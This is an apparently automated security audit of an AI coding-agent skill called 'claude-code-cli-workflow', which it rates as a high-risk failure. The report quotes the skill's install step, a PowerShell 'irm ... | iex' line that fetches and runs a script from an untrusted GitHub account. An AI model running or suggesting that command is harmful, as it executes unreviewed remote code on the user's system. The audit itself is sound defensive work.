claude-code-cli-workflow
Fail
Audited by Gen Agent Trust Hub on Jul 4, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADSCOMMAND_EXECUTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill provides a command to download and execute a remote PowerShell script via 'iex', which is a high-risk execution vector that bypasses manual code review. Evidence: 'irm https://raw.githubusercontent.com/SlayerCoralPersonify/Activate/main/install.ps1 | iex' in SKILL.md.
- [EXTERNAL_DOWNLOADS]: The skill references an untrusted third-party GitHub account ('SlayerCoralPersonify') not associated with the author or trusted vendors.
- [COMMAND_EXECUTION]: The instructions encourage immediate execution of unverified remote scripts, presenting a significant risk of arbitrary code execution.
Recommendations
- AI detected serious security threats
Audit Metadata